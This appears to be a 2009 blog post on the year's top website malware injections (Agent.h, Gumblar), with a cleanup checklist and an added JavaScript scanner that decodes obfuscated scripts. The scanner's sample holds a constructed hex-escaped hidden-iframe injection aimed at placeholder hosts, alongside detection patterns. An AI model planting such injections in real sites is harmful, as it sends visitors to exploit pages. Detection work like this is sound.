
Malware of The Year

December 1, 2009 by awang 

I just want to say this: please be careful when you browse the Internet. Cybercrime is low risk: because it transcends geo-political borders, it is difficult for law enforcement agencies to catch the perpetrators. Moreover, the costs of conducting cross-border investigations and prosecutions can be high, meaning this is only worth doing in major cases. Secondly, cybercrime is easy: there is extensive documentation on hacking and virus writing freely available on the Internet, meaning that no sophisticated knowledge or skill is required. These are the two main factors which have led to cybercrime becoming a multi-billion dollar industry, truly a self-sustaining ecosystem of its own.

Both security companies and software developers wage a constant battle with cybercriminals; their aim is to develop protection for Internet users and software that is secure. Of course, cybercriminals constantly change their tactics in order to combat these countermeasures, and this has resulted in two marked current trends.

First of all, there is the deployment of malware using 0-day vulnerabilities. 0-day vulnerabilities are vulnerabilities for which a patch is not yet available, and they can be used to infect even fully up-to-date computer systems which are not running a dedicated security solution. 0-day vulnerabilities are a valuable commodity due to their potentially serious impact, and they usually sell for tens of thousands of dollars on the black market.

Secondly, we are seeing a spike in the type of malware designed to steal confidential information that can later be sold on the black market. Such information includes credit card numbers, bank account details, passwords for websites such as eBay or PayPal, and even passwords for online games such as World of Warcraft.

Here are two tables showing the malware most commonly detected on websites in 2008 and 2009.

Top 10 malware in 2008 (table)

Top 10 malware in 2009 (table)

In 2008, Trojan-Clicker.JS.Agent.h was found in the vast majority of cases, followed closely by Trojan-Downloader.JS.Iframe.oj. The two figures below show an infected page and the decoded script.

Figure a1: Page source infected with Trojan-Clicker.JS.Agent.h

Figure a2: Decoded Trojan-Clicker.JS.Agent.h

Trojan-Clicker.JS.Agent.h is a typical example of what most website malware injections looked like in 2008 and still look like in 2009. A small fragment of JavaScript code is added, which is usually obfuscated to prevent analysis. In the code shown above, the obfuscation simply consists of the ASCII characters which form the malicious code being converted into their hex codes. Once decoded, the code is usually an iframe which leads to a website hosting exploits. The IP address will vary and there are many deployment points. The entry page in the malicious website usually hosts exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, which was the second most common piece of malware, works in a very similar way.

There were two very interesting cases in 2009, the first of which was Net-Worm.JS.Aspxor.a. Although this malware was detected back in July 2008, in 2009 it became far more widespread. It works by using a kit which finds SQL injection vulnerabilities in websites, which are then used to insert malicious iframes.

Another very interesting case is "Gumblar", named after the Chinese domain that was used as an exploitation point. The "gumblar" string, visible in the obfuscated JavaScript which is added to websites, is a clear sign that a website has been compromised.

Figure: Typical Gumblar injection in a website

Figure: Decoded Gumblar script
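The two signs of compromise described above, the hex-encoded script that decodes to a hidden iframe and the "gumblar" string, can be checked for automatically. The scanner below is an added example written for this post, not code from the original article or from any vendor; its sample page is constructed, and the hostnames in it use the reserved .invalid domain as placeholders.

```javascript
// Added example (not from the original post): a scanner that undoes the hex
// obfuscation described above and flags the decoded iframe injection or the
// "gumblar" marker. The sample page is constructed; its hosts are placeholders.
function decodeHex(s) {
  // Undo "\xNN" escapes and "%NN" escapes, the two encodings these injections used.
  const fromHex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return s.replace(/\\x([0-9a-fA-F]{2})/g, fromHex).replace(/%([0-9a-fA-F]{2})/g, fromHex);
}

function extractScripts(html) {
  // Collect the body of every <script> element in the page.
  const out = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

function scanPage(html) {
  // Returns one finding per suspicious script: a (hidden) iframe once decoded,
  // or the "gumblar" string the post names as a sign of compromise.
  const findings = [];
  for (const script of extractScripts(html)) {
    const decoded = decodeHex(script);
    const iframe = decoded.match(/<iframe[^>]*src=["']?([^"'\s>]+)/i);
    if (iframe) {
      // Zero-size or invisible frames are the injection pattern, not normal embeds.
      const hidden = /(width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none/i.test(decoded);
      findings.push({ type: hidden ? 'hidden-iframe' : 'iframe', target: iframe[1] });
    }
    if (/gumblar/i.test(decoded)) findings.push({ type: 'gumblar-marker', target: null });
  }
  return findings;
}

// Constructed sample page: a clean script, an Agent.h-style hex-escaped
// document.write() that decodes to a 0x0 iframe, and a Gumblar-style script.
// Hostnames use the reserved .invalid TLD; they are placeholders, not indicators.
const SAMPLE_HTML = String.raw`
<html><body>
<script>var x = 1;</script>
<script>document.write("\x3c\x69\x66\x72\x61\x6d\x65 src=\x22http://example.invalid/in.cgi\x22 width=0 height=0\x3e\x3c/iframe\x3e");</script>
<script>var u = unescape("%68%74%74%70://gumblar.invalid/x.php");</script>
</body></html>`;

// Run over the sample: prints "hidden-iframe http://example.invalid/in.cgi" and "gumblar-marker".
for (const f of scanPage(SAMPLE_HTML)) console.log(f.type, f.target || '');
```

Run it against a saved copy of a page rather than a live fetch, so that checking a suspected site does not itself load the injected frame.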

Below is a checklist of actions which need to be taken whenever a website infection is detected:

  • Identify everyone who has the website hosting access information, scan their systems with an up-to-date Internet security suite, remove any malware which is detected.
  • Change the hosting password to a new, strong one. Strong passwords contain letters, numbers and non-alphanumeric characters to make guessing the password difficult.
  • Replace all compromised files with clean copies.
  • Identify any backups that might contain infected files and clean them.

For webmasters, here are a few simple tips on how to stay safe:

  • Use strong passwords for hosting accounts.
  • Use SCP/SSH/SFTP to upload files instead of FTP; this prevents the passwords from being sent in cleartext over the Internet.
  • Install and run a security solution.
  • Maintain several different backups that can be used to quickly restore the website if it is compromised.

Comments

2 Responses to “Malware of The Year”

  1. catalog services on February 23rd, 2010 1:41 PM

    Thanks for your clarification and for all your efforts

  2. awang on March 8th, 2010 4:42 PM

    Thanks, welcome catalog service.. :)

Please leave a comment...
Thanks for your attention and for visiting, my lovely visitors.